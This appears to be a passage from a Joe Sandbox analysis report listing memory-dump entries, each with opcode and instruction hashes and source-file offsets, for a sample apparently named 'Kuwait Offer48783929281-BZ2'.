                                          • Opcode ID: cf90c3e0bf33c61d40dc2a30a28ab77524c8469a64c5fa27149aae4b6a9f6d59
                                          • Instruction ID: a5106ab27a1a0fd559eab1f277610a61b2b0136a0c95b687f889523409174165
                                          • Opcode Fuzzy Hash: cf90c3e0bf33c61d40dc2a30a28ab77524c8469a64c5fa27149aae4b6a9f6d59
                                          • Instruction Fuzzy Hash: E42103B4D10118DFD754DF58D894BEDB7BAFB49304F004599DA0AA7280CB385D848F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 48b046afc083acc4a13d268d38237cb8528a762ba0cf430b5f037f5a0096a41a
                                          • Instruction ID: 986a22d78d9817cc50707c4bb201506a703f2c418c8d7448783b8a28fdc95d10
                                          • Opcode Fuzzy Hash: 48b046afc083acc4a13d268d38237cb8528a762ba0cf430b5f037f5a0096a41a
                                          • Instruction Fuzzy Hash: DB212574910108DFCB54DF68E894BEEB7BAFB4A304F0055A9DA0AB7380CB385D848F80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c2e0f8009f25035590b5bc519fc8379fccf4c75c7c6eddcc4251c36cb626034
                                          • Instruction ID: 57eec7a3ab146ebdfeb88cec35c3ce98531cc30c5ef1d964347aed93ac4bcb9a
                                          • Opcode Fuzzy Hash: 5c2e0f8009f25035590b5bc519fc8379fccf4c75c7c6eddcc4251c36cb626034
                                          • Instruction Fuzzy Hash: 65015B317102208B9B04AF69E8949AEB79FEFC6721714803EE70ACB766CA748C05C790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e7d69cd7d2f412c4e9d925c868e8764acac3cc3af99fcbdec283465e8fa00ec2
                                          • Instruction ID: bfbadd97e89457583cbf63793c45487d03d09b603ed5bcd51e81970041fdb888
                                          • Opcode Fuzzy Hash: e7d69cd7d2f412c4e9d925c868e8764acac3cc3af99fcbdec283465e8fa00ec2
                                          • Instruction Fuzzy Hash: 94118B35A00220CFCB94CF68D984D9ABBF5EF89660B1140A9F906CB322DB31DC41CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6eed3265437fadafed9cf40bc716ef4d1c0a24eb4e4aa9c701ea8d49db6f874c
                                          • Instruction ID: a93d0022e8aade89625f334e6bb331256a0aa878e8bc954349c4d59d62e1287b
                                          • Opcode Fuzzy Hash: 6eed3265437fadafed9cf40bc716ef4d1c0a24eb4e4aa9c701ea8d49db6f874c
                                          • Instruction Fuzzy Hash: 2011AC71D042A5AFCB91DB78C9046EAFFF0EF02301F1445AAD0D5CB242E3348156DB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f52cf9d700959b16345672d6e8a26c0e966f415522764cceabf184bb6705950
                                          • Instruction ID: 660e8c08f9b2197cd229b4a50e658ba9ee8822ace58db00add936459893ceb69
                                          • Opcode Fuzzy Hash: 0f52cf9d700959b16345672d6e8a26c0e966f415522764cceabf184bb6705950
                                          • Instruction Fuzzy Hash: 1101B933A042545FD754DA98E040FDABBE4EF55221F25806BE844D7250D631D994CBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3cf56410e051da7a40b6803bf9e2d62142453d9f553f6e969a3bee25707724c6
                                          • Instruction ID: 7ef03ac03aeb132c29ab1b09c3f763e848c9ff4eae137d4222a4d9bfade11d11
                                          • Opcode Fuzzy Hash: 3cf56410e051da7a40b6803bf9e2d62142453d9f553f6e969a3bee25707724c6
                                          • Instruction Fuzzy Hash: 39014436350215AFDB108E59DC94FAA7BA9EB89721F108066FA15CB290CAB1D9118B90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: de3bbeed899043e8cc438cc993669670dc0c3c10fb6c48e31248df9327d40425
                                          • Instruction ID: ec57a649004e54242011d0d5142ad6d6aad751157a3c9a7fd2f90c5e5d6fe09e
                                          • Opcode Fuzzy Hash: de3bbeed899043e8cc438cc993669670dc0c3c10fb6c48e31248df9327d40425
                                          • Instruction Fuzzy Hash: 1501A1357047949FC3659B74D818E6B3BA6EFC6320F04466EE1A28B691CB35D842D790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cce3048c81129c0f30fdd012ff31819cd5971deacfc8732ef5881c91f451be74
                                          • Instruction ID: 5cf66f501352096645fe5eebd7c1f29d379e48b91e6d066c38023840547076db
                                          • Opcode Fuzzy Hash: cce3048c81129c0f30fdd012ff31819cd5971deacfc8732ef5881c91f451be74
                                          • Instruction Fuzzy Hash: EE1146B4910108DFD714DF58D898BEDBBBAFB4A309F000869DA0AB7684CB385884CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab94f491f67624674fe4835afbb858ff117847aa187fdc147833b0f11e7805a9
                                          • Instruction ID: 71e0b1003235e1ae7f0f81c23c759a11a17527cdc73f48f7dac6c6b821aee8ce
                                          • Opcode Fuzzy Hash: ab94f491f67624674fe4835afbb858ff117847aa187fdc147833b0f11e7805a9
                                          • Instruction Fuzzy Hash: 4F212974A01259CFCB54DF68D580BDDBBB4FB0A304F1144EAD849A7201C7319E85CF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 807c74f774ae1fb5fbb498bc34a48e2ead7418efff50632396e2797783fe3265
                                          • Instruction ID: c79e67d2d4b0f7eaa6ec5a079159037140a9dfab083ca956eaa38a5ee1195ef3
                                          • Opcode Fuzzy Hash: 807c74f774ae1fb5fbb498bc34a48e2ead7418efff50632396e2797783fe3265
                                          • Instruction Fuzzy Hash: DE11F3B0E0020ADFDB48EFE9D9457BEBBF5BF89300F20806AD419A7354DA345A018B91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e8591cd3d1eef85f8ba4264db682cf5b1d52f56f98bc74c7991d173240c0171
                                          • Instruction ID: 96c06ac1cc37c8afa49c0c9089789ca8e5a85552af72392c1d0f08e2e8807b15
                                          • Opcode Fuzzy Hash: 9e8591cd3d1eef85f8ba4264db682cf5b1d52f56f98bc74c7991d173240c0171
                                          • Instruction Fuzzy Hash: 6D012D31B083516FE3158B259850B57FBE8DFCA310F1548ABD9859B351CA729C41C7D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1d7e7fe53884c3aaa5dcc0ae7419b97c79ad561115f21e9056a5816fafb56ca
                                          • Instruction ID: f13dba9956a1677aef882f246a04a1743d6102184f25ace797725876d79b3500
                                          • Opcode Fuzzy Hash: b1d7e7fe53884c3aaa5dcc0ae7419b97c79ad561115f21e9056a5816fafb56ca
                                          • Instruction Fuzzy Hash: D5116DB0D05209CFDBA8DF7984456AEBFF5AB49300F1585AAD408E3201E7304689CF91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04adfa85ab4603fab006120c201bb578b48706bd5e037facb72756c14ebddfd8
                                          • Instruction ID: 3c4e253e758ae64e7cf9f12d44b31f24a4de9cd18e9d0058be92b0421db58aa5
                                          • Opcode Fuzzy Hash: 04adfa85ab4603fab006120c201bb578b48706bd5e037facb72756c14ebddfd8
                                          • Instruction Fuzzy Hash: 81017C35300610DFC7159B65D418A9AB7A6EFCA711B10856AEB068B790CF31EC52CBC5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d2d6caaa9d32cccee9a453d021455d5cbf6dc74b1965437c10e427cdd9dafbf1
                                          • Instruction ID: df2eb0fd4f32735b61fde442a9e124da654cb4a4c0a19c2bc43ba1979417ce3e
                                          • Opcode Fuzzy Hash: d2d6caaa9d32cccee9a453d021455d5cbf6dc74b1965437c10e427cdd9dafbf1
                                          • Instruction Fuzzy Hash: D401BC347006149FC3699B64D844A6B77A2EFC9320F14862CE6664B794CB76EC02DB84
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 04edd60854a944ab9331b56eca6597742d52998d10761dad4f2b21fe65e50c66
                                          • Instruction ID: 02449f89940321d82ca06184aebc034c296d17409ba6bbfb921a982f64c46285
                                          • Opcode Fuzzy Hash: 04edd60854a944ab9331b56eca6597742d52998d10761dad4f2b21fe65e50c66
                                          • Instruction Fuzzy Hash: 5B014B7095A20CEFCB95DFB8D444AADBBF8AF0A301F1014EAC848D3250E7305B95DB81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5abb7d62cc5b64e615e84ff98485c53e83ec12e51b667bb678ff0fb7d6e33734
                                          • Instruction ID: ac1c7b307bf2b9152041e11bda49e5db6bb2f6ec7909d899249dc7873b573137
                                          • Opcode Fuzzy Hash: 5abb7d62cc5b64e615e84ff98485c53e83ec12e51b667bb678ff0fb7d6e33734
                                          • Instruction Fuzzy Hash: 5AF0C836B101156BC7149E19C854DAEF7B9EFC8360B04803AF919D7361DB719C16C7D0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd0825ff1f764cbca684e197d1c748e3c2f4c3d712d517b722b0032f0e12fafd
                                          • Instruction ID: 1d6d4b9b4d759de350aeb03f673e8720f4c71bf97c13e46deeb312976f8c1c48
                                          • Opcode Fuzzy Hash: bd0825ff1f764cbca684e197d1c748e3c2f4c3d712d517b722b0032f0e12fafd
                                          • Instruction Fuzzy Hash: 11F0CD30966398DFDBA5CBB884047E93BF8AB06251F0542ABD808D3261D6348944D781
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8c8daf65b735f2a1f49c7b66d9840ee3e7abe4c847bff4fd96bc4b0da94853b6
                                          • Instruction ID: 3542ca64f548f415bf530436bf7dfda4fa26c6767a2bcf1981ec28e0ff760bbe
                                          • Opcode Fuzzy Hash: 8c8daf65b735f2a1f49c7b66d9840ee3e7abe4c847bff4fd96bc4b0da94853b6
                                          • Instruction Fuzzy Hash: F1F068353052409FC7159B25D854E6B7BAAEFC9720B0544AAFA46CB371CA31EC42C790
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6eb6270dc250c1970e628df2bb54d100e4d250ba2bda9ded04470ae4cf5c7da8
                                          • Instruction ID: 4dc4bec2f1ebba129ef2105dac0965c2568089e9d2e4da74c71b8b012f5a3c22
                                          • Opcode Fuzzy Hash: 6eb6270dc250c1970e628df2bb54d100e4d250ba2bda9ded04470ae4cf5c7da8
                                          • Instruction Fuzzy Hash: 2811E678904229CFDBA4DF14C948AE9B7B9EB49308F0095E8A51DA3A44CB745E85CF40
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3d637b974a98efee3eb8377813eac635a1d8972ae406a74a7e6f779e9cb2c4f
                                          • Instruction ID: f4cef7192d7177f59a30464913f78dea0a74ae052740e08540058f22f77c15ed
                                          • Opcode Fuzzy Hash: b3d637b974a98efee3eb8377813eac635a1d8972ae406a74a7e6f779e9cb2c4f
                                          • Instruction Fuzzy Hash: 0B11E6789412198FDB64DF64D85479EB7B6FB49304F1080AAC60AB3784DB385E85DF90
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1367100640.00000000067A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067A0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_67a0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 200c1bef5464c2fa5e5b35301a3eb0e6dace717153a006f58dfbb4b41d857d32
                                          • Instruction ID: 83368333b0d4c6cbbc0f87c93a3b9b57d731dd888e7d300c33694ec7c95657dd
                                          • Opcode Fuzzy Hash: 200c1bef5464c2fa5e5b35301a3eb0e6dace717153a006f58dfbb4b41d857d32
                                          • Instruction Fuzzy Hash: 0D11B078A41229CFDBA4DF18C888AE9B7B5FB49308F0045E9D50DE3344DB349E958F01
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: beb1aa8f7a5bb7b98a35568260670b108d0dec375d1cfa7b66937c46de4db7bf
                                          • Instruction ID: a23a80ed82f9f47fc4a0f2dfb1bfd52ead4eecda9c9b0a9145b98ff1cfc3f1f5
                                          • Opcode Fuzzy Hash: beb1aa8f7a5bb7b98a35568260670b108d0dec375d1cfa7b66937c46de4db7bf
                                          • Instruction Fuzzy Hash: A5016935300610DFC709AB25D418A5AB7ABEBCE722B108129EB068B794CF31EC42CBC4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e15b7163e82a31a9ac78df2e98a82098e38504f5272f27ea54d5d988e920022f
                                          • Instruction ID: d46d17dd10dbda3c02a2e5b23e9a7d714cfe673195c25f1a90a962c7e61c50cb
                                          • Opcode Fuzzy Hash: e15b7163e82a31a9ac78df2e98a82098e38504f5272f27ea54d5d988e920022f
                                          • Instruction Fuzzy Hash: 44F090367483859FD711CF69D894C8A7FF9AF9A72071541AAF945CB322CA31DD04C7A0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 98f7a8532c60b2d962b6b9746ac20630ca7542c8a4d95f5fc024237e0531e5d7
                                          • Instruction ID: 5644865c9c39ad3b5a700c2f3a69238fbbe3b92ad7c3aa9d9deccf7a235b620a
                                          • Opcode Fuzzy Hash: 98f7a8532c60b2d962b6b9746ac20630ca7542c8a4d95f5fc024237e0531e5d7
                                          • Instruction Fuzzy Hash: 53015A74D14208CFC754DF68D898AEDF7BAFB4A305F0055AADA0AB7680CB344C458F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a1259ba266bdbc56a9e531de8d7da13cfcf31fb8015e4fa6c2c7aff4ef9b932f
                                          • Instruction ID: 7e3374d9472d9258acb946cad24ae4e9ad2ee851373824b058827702f565f47c
                                          • Opcode Fuzzy Hash: a1259ba266bdbc56a9e531de8d7da13cfcf31fb8015e4fa6c2c7aff4ef9b932f
                                          • Instruction Fuzzy Hash: 1BF05922B0D3D05FF35247745C2072ABBA1CBC6200F1A44DBC9868F6D2DE968907C3D1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 85607db32342bb7b8c736685804867ebbcd51bfd75533a39198a8c161204f7cd
                                          • Instruction ID: 2b67d97969930b0bf35eb36125edf265eab929c0e0bb1274fb334f8a11a879bc
                                          • Opcode Fuzzy Hash: 85607db32342bb7b8c736685804867ebbcd51bfd75533a39198a8c161204f7cd
                                          • Instruction Fuzzy Hash: 5B015AB4D1410CDFD754DF58D894AEDB7BAFB4A309F001499DA0AB7680C73848448F91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7a322df569f7128d385c3b53f8f3144f2bde39a9efc5a4d9dd80c932e188ec85
                                          • Instruction ID: 8e3c1dee4978052c3f06230e1dffd19de6aeddd5bacc97debbbfb64fdfb0748f
                                          • Opcode Fuzzy Hash: 7a322df569f7128d385c3b53f8f3144f2bde39a9efc5a4d9dd80c932e188ec85
                                          • Instruction Fuzzy Hash: 51F0E931F042155FE31586159854B2BF7A9EBC8720F15446AED099B380CFB2AC41C3D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 958dc520fb56029a4c45a628c1464cf98c13d31e17a1e21eb886cb8311771736
                                          • Instruction ID: b3ebff36823ddfbd48820de3bc9055477cb0337b710a6a8992d5053325d2d09f
                                          • Opcode Fuzzy Hash: 958dc520fb56029a4c45a628c1464cf98c13d31e17a1e21eb886cb8311771736
                                          • Instruction Fuzzy Hash: DEF0C239305344AFC702DB65D884D6ABFB6EF46721701809AEB468B372C735E801DBA0
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b6a3e94cd2d6ab58a2213a788ca23d514e9dd2642f2859717ecc289228b9921f
                                          • Instruction ID: 2fe5d0eb7f3ad21ae35ff8e2ae241cbe52e68d3d9621223072686e84594d4bde
                                          • Opcode Fuzzy Hash: b6a3e94cd2d6ab58a2213a788ca23d514e9dd2642f2859717ecc289228b9921f
                                          • Instruction Fuzzy Hash: C201FBB0C09248DFDB95DFA8C9446ADBBF4BF09300F1044AAD845E3291E7345A45CF92
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1347974666.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_13c0000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4776e297ccc70a18f7d1fcb1727e24786dfeb16271f71a85a941eed200fe76bc
                                          • Instruction ID: 7348db43a984db0fa46322f689735addafebfb625b20643b46c8cd294d9ccb6f
                                          • Opcode Fuzzy Hash: 4776e297ccc70a18f7d1fcb1727e24786dfeb16271f71a85a941eed200fe76bc
                                          • Instruction Fuzzy Hash: 55F08134900369CBDB18EB68C8157EEB7B2BB84B44F10862DE40177250CB780C05CB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9ef24466f96db12a7598446267d2b027ff93895a28f50ec6589b9864816d68aa
                                          • Instruction ID: e9e1b7f563fb01c82b98951ae2b30032bc8d11a3a91b9147a53b6280b3181a07
                                          • Opcode Fuzzy Hash: 9ef24466f96db12a7598446267d2b027ff93895a28f50ec6589b9864816d68aa
                                          • Instruction Fuzzy Hash: 24F0E52170E3B1AFC761055DFC5499BABACEFC6B14B00047BE94ACB301D5208C4A83E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b6021daea84b021c36bb6a08e872e57b85e9cb51292fe877bff2a5943a41ddb0
                                          • Instruction ID: b0dcdea7481af963faba7656c758892601be3b362c4ced8eeab3428e9e1fb484
                                          • Opcode Fuzzy Hash: b6021daea84b021c36bb6a08e872e57b85e9cb51292fe877bff2a5943a41ddb0
                                          • Instruction Fuzzy Hash: 3EF0F4B0D4520CEFDB95DFA8D5446AEBBF8FB49301F2045AAD809E3250EB315A40DB91
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6630000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8b78645aa25bf8249d1c5234e974157e461e7ba2d0b3a5749e84b9feab8ea42
                                          • Instruction ID: 6bb0febcecb7b68825ebd4c4d176973bded9ae2369cc024abb0861a27ba1ebe7
                                          • Opcode Fuzzy Hash: f8b78645aa25bf8249d1c5234e974157e461e7ba2d0b3a5749e84b9feab8ea42
                                          • Instruction Fuzzy Hash: EDF0372260E3D05FC716865AA894C9A6F79D9D726030941BBF144CB553C5144C0AC371
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: abacc70ea21798b8e4433a53ddfa926d272c7416dc0ea09f0ce97040882eb41d
                                          • Instruction ID: 190431d896820cef9ca6942df6900e2252316ccd8602722f2f81e6362c906cde
                                          • Opcode Fuzzy Hash: abacc70ea21798b8e4433a53ddfa926d272c7416dc0ea09f0ce97040882eb41d
                                          • Instruction Fuzzy Hash: A2F03A34909388AFCB55DFB8C5506A9BBF4AF4A200F1894DAC888D7342D2355A02DF81
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1365689791.0000000006350000.00000040.00000800.00020000.00000000.sdmp, Offset: 06350000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_6350000_Kuwait Offer48783929281-BZ2.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c482c714354d793e27631af5a89397cd77f6dabd2955271aa545d265bae938d8
                                          • Instruction ID: 2ed80b530b42885f8c40090d22678ce3798d3b3eabf26f8b55e597da72276aea
                                          • Opcode Fuzzy Hash: c482c714354d793e27631af5a89397cd77f6dabd2955271aa545d265bae938d8
                                          • Instruction Fuzzy Hash: F9F0E530A1A308DFDB66CB748400AF97B7AAB42240F0541D7D808D7291CA39CA45D791
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1366652639.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                          Joe Sandbox IDA Plugin
